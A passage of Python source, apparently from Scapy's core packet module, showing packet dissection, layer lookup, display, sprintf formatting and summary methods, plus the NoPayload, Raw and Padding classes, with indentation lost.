YDUMP = YTXT
XSTART = 1
XDSTART = 10
y = 0.0
yd = 0.0
XMUL = 0.55
YMUL = 0.4
backcolor = colgen(0.6, 0.8, 1.0, trans=pyx.color.rgb)
forecolor = colgen(0.2, 0.5, 0.8, trans=pyx.color.rgb)
# backcolor=makecol(0.376, 0.729, 0.525, 1.0)
def hexstr(x):
# type: (bytes) -> str
return " ".join("%02x" % orb(c) for c in x)
def make_dump_txt(x, y, txt):
# type: (int, float, bytes) -> pyx.text.text
return pyx.text.text(
XDSTART + x * XMUL,
(YDUMP - y) * YMUL,
r"\tt{%s}" % hexstr(txt),
[pyx.text.size.Large]
)
def make_box(o):
# type: (pyx.bbox.bbox) -> pyx.bbox.bbox
return pyx.box.rect(
o.left(), o.bottom(), o.width(), o.height(),
relcenter=(0.5, 0.5)
)
def make_frame(lst):
# type: (List[Any]) -> pyx.path.path
if len(lst) == 1:
b = lst[0].bbox()
b.enlarge(pyx.unit.u_pt)
return b.path()
else:
fb = lst[0].bbox()
fb.enlarge(pyx.unit.u_pt)
lb = lst[-1].bbox()
lb.enlarge(pyx.unit.u_pt)
if len(lst) == 2 and fb.left() > lb.right():
return pyx.path.path(pyx.path.moveto(fb.right(), fb.top()),
pyx.path.lineto(fb.left(), fb.top()),
pyx.path.lineto(fb.left(), fb.bottom()), # noqa: E501
pyx.path.lineto(fb.right(), fb.bottom()), # noqa: E501
pyx.path.moveto(lb.left(), lb.top()),
pyx.path.lineto(lb.right(), lb.top()),
pyx.path.lineto(lb.right(), lb.bottom()), # noqa: E501
pyx.path.lineto(lb.left(), lb.bottom())) # noqa: E501
else:
# XXX
gb = lst[1].bbox()
if gb != lb:
gb.enlarge(pyx.unit.u_pt)
kb = lst[-2].bbox()
if kb != gb and kb != lb:
kb.enlarge(pyx.unit.u_pt)
return pyx.path.path(pyx.path.moveto(fb.left(), fb.top()),
pyx.path.lineto(fb.right(), fb.top()),
pyx.path.lineto(fb.right(), kb.bottom()), # noqa: E501
pyx.path.lineto(lb.right(), kb.bottom()), # noqa: E501
pyx.path.lineto(lb.right(), lb.bottom()), # noqa: E501
pyx.path.lineto(lb.left(), lb.bottom()), # noqa: E501
pyx.path.lineto(lb.left(), gb.top()),
pyx.path.lineto(fb.left(), gb.top()),
pyx.path.closepath(),)
def make_dump(s, # type: bytes
shift=0, # type: int
y=0., # type: float
col=None, # type: pyx.color.color
bkcol=None, # type: pyx.color.color
large=16 # type: int
):
# type: (...) -> Tuple[pyx.canvas.canvas, pyx.bbox.bbox, int, float] # noqa: E501
c = pyx.canvas.canvas()
tlist = []
while s:
dmp, s = s[:large - shift], s[large - shift:]
txt = make_dump_txt(shift, y, dmp)
tlist.append(txt)
shift += len(dmp)
if shift >= 16:
shift = 0
y += 1
if col is None:
col = pyx.color.rgb.red
if bkcol is None:
bkcol = pyx.color.rgb.white
c.stroke(make_frame(tlist), [col, pyx.deco.filled([bkcol]), pyx.style.linewidth.Thick]) # noqa: E501
for txt in tlist:
c.insert(txt)
return c, tlist[-1].bbox(), shift, y
last_shift, last_y = 0, 0.0
while t:
bkcol = next(backcolor)
proto, fields = t.pop()
y += 0.5
pt = pyx.text.text(
XSTART,
(YTXT - y) * YMUL,
r"\font\cmssfont=cmss10\cmssfont{%s}" % tex_escape(
str(proto.name)
),
[pyx.text.size.Large]
)
y += 1
ptbb = pt.bbox()
ptbb.enlarge(pyx.unit.u_pt * 2)
canvas.stroke(ptbb.path(), [pyx.color.rgb.black, pyx.deco.filled([bkcol])]) # noqa: E501
canvas.insert(pt)
for field, fval, fdump in fields:
col = next(forecolor)
ft = pyx.text.text(XSTART, (YTXT - y) * YMUL, r"\font\cmssfont=cmss10\cmssfont{%s}" % tex_escape(field.name)) # noqa: E501
if isinstance(field, BitField):
fsize = '%sb' % field.size
else:
fsize = '%sB' % len(fdump)
if (hasattr(field, 'field') and
'LE' in field.field.__class__.__name__[:3] or
'LE' in field.__class__.__name__[:3]):
fsize = r'$\scriptstyle\langle$' + fsize
st = pyx.text.text(XSTART + 3.4, (YTXT - y) * YMUL, r"\font\cmbxfont=cmssbx10 scaled 600\cmbxfont{%s}" % fsize, [pyx.text.halign.boxright]) # noqa: E501
if isinstance(fval, str):
if len(fval) > 18:
fval = fval[:18] + "[...]"
else:
fval = ""
vt = pyx.text.text(XSTART + 3.5, (YTXT - y) * YMUL, r"\font\cmssfont=cmss10\cmssfont{%s}" % tex_escape(fval)) # noqa: E501
y += 1.0
if fdump:
dt, target, last_shift, last_y = make_dump(fdump, last_shift, last_y, col, bkcol) # noqa: E501
dtb = target
vtb = vt.bbox()
bxvt = make_box(vtb)
bxdt = make_box(dtb)
dtb.enlarge(pyx.unit.u_pt)
try:
if yd < 0:
cnx = pyx.connector.curve(bxvt, bxdt, absangle1=0, absangle2=-90) # noqa: E501
else:
cnx = pyx.connector.curve(bxvt, bxdt, absangle1=0, absangle2=90) # noqa: E501
except Exception:
pass
else:
canvas.stroke(cnx, [pyx.style.linewidth.thin, pyx.deco.earrow.small, col]) # noqa: E501
canvas.insert(dt)
canvas.insert(ft)
canvas.insert(st)
canvas.insert(vt)
last_y += layer_shift
return canvas
def extract_padding(self, s):
# type: (bytes) -> Tuple[bytes, Optional[bytes]]
"""
DEV: to be overloaded to extract current layer's padding.
:param str s: the current layer
:return: a couple of strings (actual layer, padding)
"""
return s, None
def post_dissect(self, s):
# type: (bytes) -> bytes
"""DEV: is called right after the current layer has been dissected"""
return s
def pre_dissect(self, s):
# type: (bytes) -> bytes
"""DEV: is called right before the current layer is dissected"""
return s
def do_dissect(self, s):
# type: (bytes) -> bytes
_raw = s
self.raw_packet_cache_fields = {}
for f in self.fields_desc:
if not s:
break
s, fval = f.getfield(self, s)
# Skip unused ConditionalField
if isinstance(f, ConditionalField) and fval is None:
continue
# We need to track fields with mutable values to discard
# .raw_packet_cache when needed.
if f.islist or f.holds_packets or f.ismutable:
self.raw_packet_cache_fields[f.name] = f.do_copy(fval)
self.fields[f.name] = fval
self.raw_packet_cache = _raw[:-len(s)] if s else _raw
self.explicit = 1
return s
def do_dissect_payload(self, s):
# type: (bytes) -> None
"""
Perform the dissection of the layer's payload
:param str s: the raw layer
"""
if s:
cls = self.guess_payload_class(s)
try:
p = cls(s, _internal=1, _underlayer=self)
except KeyboardInterrupt:
raise
except Exception:
if conf.debug_dissector:
if issubtype(cls, Packet):
log_runtime.error("%s dissector failed", cls.__name__)
else:
log_runtime.error("%s.guess_payload_class() returned "
"[%s]",
self.__class__.__name__, repr(cls))
if cls is not None:
raise
p = conf.raw_layer(s, _internal=1, _underlayer=self)
self.add_payload(p)
def dissect(self, s):
# type: (bytes) -> None
s = self.pre_dissect(s)
s = self.do_dissect(s)
s = self.post_dissect(s)
payl, pad = self.extract_padding(s)
self.do_dissect_payload(payl)
if pad and conf.padding:
self.add_payload(conf.padding_layer(pad))
def guess_payload_class(self, payload):
# type: (bytes) -> Type[Packet]
"""
DEV: Guesses the next payload class from layer bonds.
Can be overloaded to use a different mechanism.
:param str payload: the layer's payload
:return: the payload class
"""
for t in self.aliastypes:
for fval, cls in t.payload_guess:
try:
if all(v == self.getfieldval(k)
for k, v in six.iteritems(fval)):
return cls # type: ignore
except AttributeError:
pass
return self.default_payload_class(payload)
def default_payload_class(self, payload):
# type: (bytes) -> Type[Packet]
"""
DEV: Returns the default payload class if nothing has been found by the
guess_payload_class() method.
:param str payload: the layer's payload
:return: the default payload class define inside the configuration file
"""
return conf.raw_layer
def hide_defaults(self):
# type: () -> None
"""Removes fields' values that are the same as default values."""
# use list(): self.fields is modified in the loop
for k, v in list(six.iteritems(self.fields)):
v = self.fields[k]
if k in self.default_fields:
if self.default_fields[k] == v:
del self.fields[k]
self.payload.hide_defaults()
def update_sent_time(self, time):
# type: (Optional[float]) -> None
"""Use by clone_with to share the sent_time value"""
pass
def clone_with(self, payload=None, share_time=False, **kargs):
# type: (Optional[Any], bool, **Any) -> Any
pkt = self.__class__()
pkt.explicit = 1
pkt.fields = kargs
pkt.default_fields = self.copy_fields_dict(self.default_fields)
pkt.overloaded_fields = self.overloaded_fields.copy()
pkt.time = self.time
pkt.underlayer = self.underlayer
pkt.post_transforms = self.post_transforms
pkt.raw_packet_cache = self.raw_packet_cache
pkt.raw_packet_cache_fields = self.copy_fields_dict(
self.raw_packet_cache_fields
)
pkt.wirelen = self.wirelen
if payload is not None:
pkt.add_payload(payload)
if share_time:
# This binds the subpacket .sent_time to this layer
def _up_time(x, parent=self):
# type: (float, Packet) -> None
parent.sent_time = x
pkt.update_sent_time = _up_time # type: ignore
return pkt
def __iter__(self):
# type: () -> Iterator[Packet]
"""Iterates through all sub-packets generated by this Packet."""
# We use __iterlen__ as low as possible, to lower processing time
def loop(todo, done, self=self):
# type: (List[str], Dict[str, Any], Any) -> Iterator[Packet]
if todo:
eltname = todo.pop()
elt = self.getfieldval(eltname)
if not isinstance(elt, Gen):
if self.get_field(eltname).islist:
elt = SetGen([elt])
else:
elt = SetGen(elt)
for e in elt:
done[eltname] = e
for x in loop(todo[:], done):
yield x
else:
if isinstance(self.payload, NoPayload):
payloads = SetGen([None]) # type: SetGen[Packet]
else:
payloads = self.payload
share_time = False
if self.fields == done and payloads.__iterlen__() == 1:
# In this case, the packets are identical. Let's bind
# their sent_time attribute for sending purpose
share_time = True
for payl in payloads:
# Let's make sure subpackets are consistent
done2 = done.copy()
for k in done2:
if isinstance(done2[k], VolatileValue):
done2[k] = done2[k]._fix()
pkt = self.clone_with(payload=payl, share_time=share_time,
**done2)
yield pkt
if self.explicit or self.raw_packet_cache is not None:
todo = []
done = self.fields
else:
todo = [k for (k, v) in itertools.chain(six.iteritems(self.default_fields), # noqa: E501
six.iteritems(self.overloaded_fields)) # noqa: E501
if isinstance(v, VolatileValue)] + list(self.fields)
done = {}
return loop(todo, done)
def __iterlen__(self):
# type: () -> int
"""Predict the total length of the iterator"""
fields = [key for (key, val) in itertools.chain(six.iteritems(self.default_fields), # noqa: E501
six.iteritems(self.overloaded_fields))
if isinstance(val, VolatileValue)] + list(self.fields)
length = 1
def is_valid_gen_tuple(x):
# type: (Any) -> bool
if not isinstance(x, tuple):
return False
return len(x) == 2 and all(isinstance(z, int) for z in x)
for field in fields:
fld, val = self.getfield_and_val(field)
if hasattr(val, "__iterlen__"):
length *= val.__iterlen__()
elif is_valid_gen_tuple(val):
length *= (val[1] - val[0] + 1)
elif isinstance(val, list) and not fld.islist:
len2 = 0
for x in val:
if hasattr(x, "__iterlen__"):
len2 += x.__iterlen__()
elif is_valid_gen_tuple(x):
len2 += (x[1] - x[0] + 1)
elif isinstance(x, list):
len2 += len(x)
else:
len2 += 1
length *= len2 or 1
if not isinstance(self.payload, NoPayload):
return length * self.payload.__iterlen__()
return length
def iterpayloads(self):
# type: () -> Iterator[Packet]
"""Used to iter through the payloads of a Packet.
Useful for DNS or 802.11 for instance.
"""
yield self
current = self
while current.payload:
current = current.payload
yield current
def __gt__(self, other):
# type: (Packet) -> int
"""True if other is an answer from self (self ==> other)."""
if isinstance(other, Packet):
return other < self
elif isinstance(other, bytes):
return 1
else:
raise TypeError((self, other))
def __lt__(self, other):
# type: (Packet) -> int
"""True if self is an answer from other (other ==> self)."""
if isinstance(other, Packet):
return self.answers(other)
elif isinstance(other, bytes):
return 1
else:
raise TypeError((self, other))
def __eq__(self, other):
# type: (Any) -> bool
if not isinstance(other, self.__class__):
return False
for f in self.fields_desc:
if f not in other.fields_desc:
return False
if self.getfieldval(f.name) != other.getfieldval(f.name):
return False
return self.payload == other.payload
def __ne__(self, other):
# type: (Any) -> bool
return not self.__eq__(other)
# Note: setting __hash__ to None is the standard way
# of making an object un-hashable. mypy doesn't know that
__hash__ = None # type: ignore
def hashret(self):
# type: () -> bytes
"""DEV: returns a string that has the same value for a request
and its answer."""
return self.payload.hashret()
def answers(self, other):
# type: (Packet) -> int
"""DEV: true if self is an answer from other"""
if other.__class__ == self.__class__:
return self.payload.answers(other.payload)
return 0
def layers(self):
# type: () -> List[Type[Packet]]
"""returns a list of layer classes (including subclasses) in this packet""" # noqa: E501
layers = []
lyr = self # type: Optional[Packet]
while lyr:
layers.append(lyr.__class__)
lyr = lyr.payload.getlayer(0, _subclass=True)
return layers
def haslayer(self, cls, _subclass=None):
# type: (Union[Type[Packet], str], Optional[bool]) -> int
"""
true if self has a layer that is an instance of cls.
Superseded by "cls in self" syntax.
"""
if _subclass is None:
_subclass = self.match_subclass or None
if _subclass:
match = issubtype
else:
match = lambda cls1, cls2: bool(cls1 == cls2)
if cls is None or match(self.__class__, cls) \
or cls in [self.__class__.__name__, self._name]:
return True
for f in self.packetfields:
fvalue_gen = self.getfieldval(f.name)
if fvalue_gen is None:
continue
if not f.islist:
fvalue_gen = SetGen(fvalue_gen, _iterpacket=0)
for fvalue in fvalue_gen:
if isinstance(fvalue, Packet):
ret = fvalue.haslayer(cls, _subclass=_subclass)
if ret:
return ret
return self.payload.haslayer(cls, _subclass=_subclass)
def getlayer(self,
cls, # type: Union[int, Type[Packet], str]
nb=1, # type: int
_track=None, # type: Optional[List[int]]
_subclass=None, # type: Optional[bool]
**flt # type: Any
):
# type: (...) -> Optional[Packet]
"""Return the nb^th layer that is an instance of cls, matching flt
values.
"""
if _subclass is None:
_subclass = self.match_subclass or None
if _subclass:
match = issubtype
else:
match = lambda cls1, cls2: bool(cls1 == cls2)
# Note:
# cls can be int, packet, str
# string_class_name can be packet, str (packet or packet+field)
# class_name can be packet, str (packet only)
if isinstance(cls, int):
nb = cls + 1
string_class_name = "" # type: Union[Type[Packet], str]
else:
string_class_name = cls
class_name = "" # type: Union[Type[Packet], str]
fld = None # type: Optional[str]
if isinstance(string_class_name, str) and "." in string_class_name:
class_name, fld = string_class_name.split(".", 1)
else:
class_name, fld = string_class_name, None
if not class_name or match(self.__class__, class_name) \
or class_name in [self.__class__.__name__, self._name]:
if all(self.getfieldval(fldname) == fldvalue
for fldname, fldvalue in six.iteritems(flt)):
if nb == 1:
if fld is None:
return self
else:
return self.getfieldval(fld) # type: ignore
else:
nb -= 1
for f in self.packetfields:
fvalue_gen = self.getfieldval(f.name)
if fvalue_gen is None:
continue
if not f.islist:
fvalue_gen = SetGen(fvalue_gen, _iterpacket=0)
for fvalue in fvalue_gen:
if isinstance(fvalue, Packet):
track = [] # type: List[int]
ret = fvalue.getlayer(class_name, nb=nb, _track=track,
_subclass=_subclass, **flt)
if ret is not None:
return ret
nb = track[0]
return self.payload.getlayer(class_name, nb=nb, _track=_track,
_subclass=_subclass, **flt)
def firstlayer(self):
# type: () -> Packet
q = self
while q.underlayer is not None:
q = q.underlayer
return q
def __getitem__(self, cls):
# type: (Union[Type[Packet], str]) -> Any
if isinstance(cls, slice):
lname = cls.start
if cls.stop:
ret = self.getlayer(cls.start, nb=cls.stop, **(cls.step or {}))
else:
ret = self.getlayer(cls.start, **(cls.step or {}))
else:
lname = cls
ret = self.getlayer(cls)
if ret is None:
if isinstance(lname, type):
name = lname.__name__
elif not isinstance(lname, bytes):
name = repr(lname)
else:
name = cast(str, lname)
raise IndexError("Layer [%s] not found" % name)
return ret
def __delitem__(self, cls):
# type: (Type[Packet]) -> None
del(self[cls].underlayer.payload)
def __setitem__(self, cls, val):
# type: (Type[Packet], Packet) -> None
self[cls].underlayer.payload = val
def __contains__(self, cls):
# type: (Union[Type[Packet], str]) -> int
"""
"cls in self" returns true if self has a layer which is an
instance of cls.
"""
return self.haslayer(cls)
def route(self):
# type: () -> Tuple[Any, Optional[str], Optional[str]]
return self.payload.route()
def fragment(self, *args, **kargs):
# type: (*Any, **Any) -> List[Packet]
return self.payload.fragment(*args, **kargs)
def display(self, *args, **kargs): # Deprecated. Use show()
# type: (*Any, **Any) -> None
"""Deprecated. Use show() method."""
self.show(*args, **kargs)
def _show_or_dump(self,
dump=False, # type: bool
indent=3, # type: int
lvl="", # type: str
label_lvl="", # type: str
first_call=True # type: bool
):
# type: (...) -> Optional[str]
"""
Internal method that shows or dumps a hierarchical view of a packet.
Called by show.
:param dump: determine if it prints or returns the string value
:param int indent: the size of indentation for each layer
:param str lvl: additional information about the layer lvl
:param str label_lvl: additional information about the layer fields
:param first_call: determine if the current function is the first
:return: return a hierarchical view if dump, else print it
"""
if dump:
from scapy.themes import AnsiColorTheme
ct = AnsiColorTheme() # No color for dump output
else:
ct = conf.color_theme
s = "%s%s %s %s \n" % (label_lvl,
ct.punct("###["),
ct.layer_name(self.name),
ct.punct("]###"))
for f in self.fields_desc:
if isinstance(f, ConditionalField) and not f._evalcond(self):
continue
if isinstance(f, Emph) or f in conf.emph:
ncol = ct.emph_field_name
vcol = ct.emph_field_value
else:
ncol = ct.field_name
vcol = ct.field_value
fvalue = self.getfieldval(f.name)
if isinstance(fvalue, Packet) or (f.islist and f.holds_packets and isinstance(fvalue, list)): # noqa: E501
pad = max(0, 10 - len(f.name)) * " "
s += "%s \\%s%s\\\n" % (label_lvl + lvl, ncol(f.name), pad)
fvalue_gen = SetGen(
fvalue,
_iterpacket=0
) # type: SetGen[Packet]
for fvalue in fvalue_gen:
s += fvalue._show_or_dump(dump=dump, indent=indent, label_lvl=label_lvl + lvl + " |", first_call=False) # noqa: E501
else:
pad = max(0, 10 - len(f.name)) * " "
begn = "%s %s%s%s " % (label_lvl + lvl,
ncol(f.name),
pad,
ct.punct("="),)
reprval = f.i2repr(self, fvalue)
if isinstance(reprval, str):
reprval = reprval.replace("\n", "\n" + " " * (len(label_lvl) + # noqa: E501
len(lvl) +
len(f.name) +
4))
s += "%s%s\n" % (begn, vcol(reprval))
if self.payload:
s += self.payload._show_or_dump( # type: ignore
dump=dump,
indent=indent,
lvl=lvl + (" " * indent * self.show_indent),
label_lvl=label_lvl,
first_call=False
)
if first_call and not dump:
print(s)
return None
else:
return s
def show(self, dump=False, indent=3, lvl="", label_lvl=""):
# type: (bool, int, str, str) -> Optional[Any]
"""
Prints or returns (when "dump" is true) a hierarchical view of the
packet.
:param dump: determine if it prints or returns the string value
:param int indent: the size of indentation for each layer
:param str lvl: additional information about the layer lvl
:param str label_lvl: additional information about the layer fields
:return: return a hierarchical view if dump, else print it
"""
return self._show_or_dump(dump, indent, lvl, label_lvl)
def show2(self, dump=False, indent=3, lvl="", label_lvl=""):
# type: (bool, int, str, str) -> Optional[Any]
"""
Prints or returns (when "dump" is true) a hierarchical view of an
assembled version of the packet, so that automatic fields are
calculated (checksums, etc.)
:param dump: determine if it prints or returns the string value
:param int indent: the size of indentation for each layer
:param str lvl: additional information about the layer lvl
:param str label_lvl: additional information about the layer fields
:return: return a hierarchical view if dump, else print it
"""
return self.__class__(raw(self)).show(dump, indent, lvl, label_lvl)
def sprintf(self, fmt, relax=1):
# type: (str, int) -> str
"""
sprintf(format, [relax=1]) -> str
Where format is a string that can include directives. A directive
begins and ends by % and has the following format:
``%[fmt[r],][cls[:nb].]field%``
:param fmt: is a classic printf directive, "r" can be appended for raw
substitution:
(ex: IP.flags=0x18 instead of SA), nb is the number of the layer
(ex: for IP/IP packets, IP:2.src is the src of the upper IP layer).
Special case : "%.time%" is the creation time.
Ex::
p.sprintf(
"%.time% %-15s,IP.src% -> %-15s,IP.dst% %IP.chksum% "
"%03xr,IP.proto% %r,TCP.flags%"
)
Moreover, the format string can include conditional statements. A
conditional statement looks like : {layer:string} where layer is a
layer name, and string is the string to insert in place of the
condition if it is true, i.e. if layer is present. If layer is
preceded by a "!", the result is inverted. Conditions can be
imbricated. A valid statement can be::
p.sprintf("This is a{TCP: TCP}{UDP: UDP}{ICMP:n ICMP} packet")
p.sprintf("{IP:%IP.dst% {ICMP:%ICMP.type%}{TCP:%TCP.dport%}}")
A side effect is that, to obtain "{" and "}" characters, you must use
"%(" and "%)".
"""
escape = {"%": "%",
"(": "{",
")": "}"}
# Evaluate conditions
while "{" in fmt:
i = fmt.rindex("{")
j = fmt[i + 1:].index("}")
cond = fmt[i + 1:i + j + 1]
k = cond.find(":")
if k < 0:
raise Scapy_Exception("Bad condition in format string: [%s] (read sprintf doc!)" % cond) # noqa: E501
cond, format_ = cond[:k], cond[k + 1:]
res = False
if cond[0] == "!":
res = True
cond = cond[1:]
if self.haslayer(cond):
res = not res
if not res:
format_ = ""
fmt = fmt[:i] + format_ + fmt[i + j + 2:]
# Evaluate directives
s = ""
while "%" in fmt:
i = fmt.index("%")
s += fmt[:i]
fmt = fmt[i + 1:]
if fmt and fmt[0] in escape:
s += escape[fmt[0]]
fmt = fmt[1:]
continue
try:
i = fmt.index("%")
sfclsfld = fmt[:i]
fclsfld = sfclsfld.split(",")
if len(fclsfld) == 1:
f = "s"
clsfld = fclsfld[0]
elif len(fclsfld) == 2:
f, clsfld = fclsfld
else:
raise Scapy_Exception
if "." in clsfld:
cls, fld = clsfld.split(".")
else:
cls = self.__class__.__name__
fld = clsfld
num = 1
if ":" in cls:
cls, snum = cls.split(":")
num = int(snum)
fmt = fmt[i + 1:]
except Exception:
raise Scapy_Exception("Bad format string [%%%s%s]" % (fmt[:25], fmt[25:] and "...")) # noqa: E501
else:
if fld == "time":
val = time.strftime(
"%H:%M:%S.%%06i",
time.localtime(float(self.time))
) % int((self.time - int(self.time)) * 1000000)
elif cls == self.__class__.__name__ and hasattr(self, fld):
if num > 1:
val = self.payload.sprintf("%%%s,%s:%s.%s%%" % (f, cls, num - 1, fld), relax) # noqa: E501
f = "s"
elif f[-1] == "r": # Raw field value
val = getattr(self, fld)
f = f[:-1]
if not f:
f = "s"
else:
val = getattr(self, fld)
if fld in self.fieldtype:
val = self.fieldtype[fld].i2repr(self, val)
else:
val = self.payload.sprintf("%%%s%%" % sfclsfld, relax)
f = "s"
s += ("%" + f) % val
s += fmt
return s
def mysummary(self):
# type: () -> str
"""DEV: can be overloaded to return a string that summarizes the layer.
Only one mysummary() is used in a whole packet summary: the one of the upper layer, # noqa: E501
except if a mysummary() also returns (as a couple) a list of layers whose # noqa: E501
mysummary() must be called if they are present."""
return ""
def _do_summary(self):
# type: () -> Tuple[int, str, List[Any]]
found, s, needed = self.payload._do_summary()
ret = ""
if not found or self.__class__ in needed:
ret = self.mysummary()
if isinstance(ret, tuple):
ret, n = ret
needed += n
if ret or needed:
found = 1
if not ret:
ret = self.__class__.__name__ if self.show_summary else ""
if self.__class__ in conf.emph:
impf = []
for f in self.fields_desc:
if f in conf.emph:
impf.append("%s=%s" % (f.name, f.i2repr(self, self.getfieldval(f.name)))) # noqa: E501
ret = "%s [%s]" % (ret, " ".join(impf))
if ret and s:
ret = "%s / %s" % (ret, s)
else:
ret = "%s%s" % (ret, s)
return found, ret, needed
def summary(self, intern=0):
# type: (int) -> str
"""Prints a one line summary of a packet."""
return self._do_summary()[1]
def lastlayer(self, layer=None):
# type: (Optional[Packet]) -> Packet
"""Returns the uppest layer of the packet"""
return self.payload.lastlayer(self)
def decode_payload_as(self, cls):
# type: (Type[Packet]) -> None
"""Reassembles the payload and decode it using another packet class"""
s = raw(self.payload)
self.payload = cls(s, _internal=1, _underlayer=self)
pp = self
while pp.underlayer is not None:
pp = pp.underlayer
self.payload.dissection_done(pp)
def command(self):
# type: () -> str
"""
Returns a string representing the command you have to type to
obtain the same packet
"""
f = []
for fn, fv in six.iteritems(self.fields):
fld = self.get_field(fn)
if isinstance(fv, (list, dict, set)) and len(fv) == 0:
continue
if isinstance(fv, Packet):
fv = fv.command()
elif fld.islist and fld.holds_packets and isinstance(fv, list):
fv = "[%s]" % ",".join(map(Packet.command, fv))
elif isinstance(fld, FlagsField):
fv = int(fv)
elif callable(getattr(fv, 'command', None)):
fv = fv.command()
else:
fv = repr(fv)
f.append("%s=%s" % (fn, fv))
c = "%s(%s)" % (self.__class__.__name__, ", ".join(f))
pc = self.payload.command()
if pc:
c += "/" + pc
return c
def convert_to(self, other_cls, **kwargs):
# type: (Type[Packet], **Any) -> Packet
"""Converts this Packet to another type.
This is not guaranteed to be a lossless process.
By default, this only implements conversion to ``Raw``.
:param other_cls: Reference to a Packet class to convert to.
:type other_cls: Type[scapy.packet.Packet]
:return: Converted form of the packet.
:rtype: other_cls
:raises TypeError: When conversion is not possible
"""
if not issubtype(other_cls, Packet):
raise TypeError("{} must implement Packet".format(other_cls))
if other_cls is Raw:
return Raw(raw(self))
if "_internal" not in kwargs:
return other_cls.convert_packet(self, _internal=True, **kwargs)
raise TypeError("Cannot convert {} to {}".format(
type(self).__name__, other_cls.__name__))
@classmethod
def convert_packet(cls, pkt, **kwargs):
# type: (Packet, **Any) -> Packet
"""Converts another packet to be this type.
This is not guaranteed to be a lossless process.
:param pkt: The packet to convert.
:type pkt: scapy.packet.Packet
:return: Converted form of the packet.
:rtype: cls
:raises TypeError: When conversion is not possible
"""
if not isinstance(pkt, Packet):
raise TypeError("Can only convert Packets")
if "_internal" not in kwargs:
return pkt.convert_to(cls, _internal=True, **kwargs)
raise TypeError("Cannot convert {} to {}".format(
type(pkt).__name__, cls.__name__))
@classmethod
def convert_packets(cls,
pkts, # type: List[Packet]
**kwargs # type: Any
):
# type: (...) -> Iterator[Iterator[Packet]]
"""Converts many packets to this type.
This is implemented as a generator.
See ``Packet.convert_packet``.
"""
for pkt in pkts:
yield cls.convert_packet(pkt, **kwargs)
class NoPayload(Packet):
def __new__(cls, *args, **kargs):
# type: (Type[Packet], *Any, **Any) -> Packet
singl = cls.__dict__.get("__singl__")
if singl is None:
cls.__singl__ = singl = Packet.__new__(cls)
Packet.__init__(singl)
return singl # type: ignore
def __init__(self, *args, **kargs):
# type: (*Any, **Any) -> None
pass
def dissection_done(self, pkt):
# type: (Packet) -> None
pass
def add_payload(self, payload):
# type: (Union[Packet, bytes]) -> NoReturn
raise Scapy_Exception("Can't add payload to NoPayload instance")
def remove_payload(self):
# type: () -> None
pass
def add_underlayer(self, underlayer):
# type: (Any) -> None
pass
def remove_underlayer(self, other):
# type: (Packet) -> None
pass
def copy(self):
# type: () -> NoPayload
return self
def clear_cache(self):
# type: () -> None
pass
def __repr__(self):
# type: () -> str
return ""
def __str__(self):
# type: () -> str
return ""
def __bytes__(self):
# type: () -> bytes
return b""
def __nonzero__(self):
# type: () -> bool
return False
__bool__ = __nonzero__
def do_build(self):
# type: () -> bytes
return b""
def build(self):
# type: () -> bytes
return b""
def build_padding(self):
# type: () -> bytes
return b""
def build_done(self, p):
# type: (bytes) -> bytes
return p
def build_ps(self, internal=0):
# type: (int) -> Tuple[bytes, List[Any]]
return b"", []
def getfieldval(self, attr):
# type: (str) -> NoReturn
raise AttributeError(attr)
def getfield_and_val(self, attr):
# type: (str) -> NoReturn
raise AttributeError(attr)
def setfieldval(self, attr, val):
# type: (str, Any) -> NoReturn
raise AttributeError(attr)
def delfieldval(self, attr):
# type: (str) -> NoReturn
raise AttributeError(attr)
def hide_defaults(self):
# type: () -> None
pass
def __iter__(self):
# type: () -> Iterator[Packet]
return iter([])
def __eq__(self, other):
# type: (Any) -> bool
if isinstance(other, NoPayload):
return True
return False
def hashret(self):
# type: () -> bytes
return b""
def answers(self, other):
# type: (NoPayload) -> bool
return isinstance(other, (NoPayload, conf.padding_layer)) # noqa: E501
def haslayer(self, cls, _subclass=None):
# type: (Union[Type[Packet], str], Optional[bool]) -> int
return 0
def getlayer(self,
cls, # type: Union[int, Type[Packet], str]
nb=1, # type: int
_track=None, # type: Optional[List[int]]
_subclass=None, # type: Optional[bool]
**flt # type: Any
):
# type: (...) -> Optional[Packet]
if _track is not None:
_track.append(nb)
return None
def fragment(self, *args, **kargs):
# type: (*Any, **Any) -> List[Packet]
raise Scapy_Exception("cannot fragment this packet")
def show(self, dump=False, indent=3, lvl="", label_lvl=""):
# type: (bool, int, str, str) -> None
pass
def sprintf(self, fmt, relax=1):
# type: (str, int) -> str
if relax:
return "??"
else:
raise Scapy_Exception("Format not found [%s]" % fmt)
def _do_summary(self):
# type: () -> Tuple[int, str, List[Any]]
return 0, "", []
def layers(self):
# type: () -> List[Type[Packet]]
return []
def lastlayer(self, layer=None):
# type: (Optional[Packet]) -> Packet
return layer or self
def command(self):
# type: () -> str
return ""
def route(self):
# type: () -> Tuple[None, None, None]
return (None, None, None)
####################
# packet classes #
####################
class Raw(Packet):
name = "Raw"
fields_desc = [StrField("load", b"")]
def __init__(self, _pkt=b"", *args, **kwargs):
# type: (bytes, *Any, **Any) -> None
if _pkt and not isinstance(_pkt, bytes):
_pkt = bytes_encode(_pkt)
super(Raw, self).__init__(_pkt, *args, **kwargs)
def answers(self, other):
# type: (Packet) -> int
return 1
def mysummary(self):
# type: () -> str
cs = conf.raw_summary
if cs:
if callable(cs):
return "Raw %s" % cs(self.load)
else:
return "Raw %r" % self.load
return Packet.mysummary(self)
@classmethod
def convert_packet(cls, pkt, **kwargs):
# type: (Packet, **Any) -> Raw
return Raw(raw(pkt))
class Padding(Raw):
name = "Padding"
def self_build(self, field_pos_list=None):
# type: (Optional[Any]) -> bytes
return b""
def build_padding(self):
# type: () -> bytes
return (
bytes_encode(self.load) if self.raw_packet_cache is None
else self.raw_packet_cache
) + self.payload.build_padding()
conf.raw_layer = Raw
conf.padding_layer = Padding
if conf.default_l2 is None:
conf.default_l2 = Raw
#################
# Bind layers #
#################
def bind_bottom_up(lower, # type: Type[Packet]
upper, # type: Type[Packet]
__fval=None, # type: Optional[Any]
**fval # type: Any
):
# type: (...) -> None
r"""Bind 2 layers for dissection.
The upper layer will be chosen for dissection on top of the lower layer, if
ALL the passed arguments are validated. If multiple calls are made with
the same layers, the last one will be used as default.
ex:
>>> bind_bottom_up(Ether, SNAP, type=0x1234)
>>> Ether(b'\xff\xff\xff\xff\xff\xff\xd0P\x99V\xdd\xf9\x124\x00\x00\x00\x00\x00') # noqa: E501
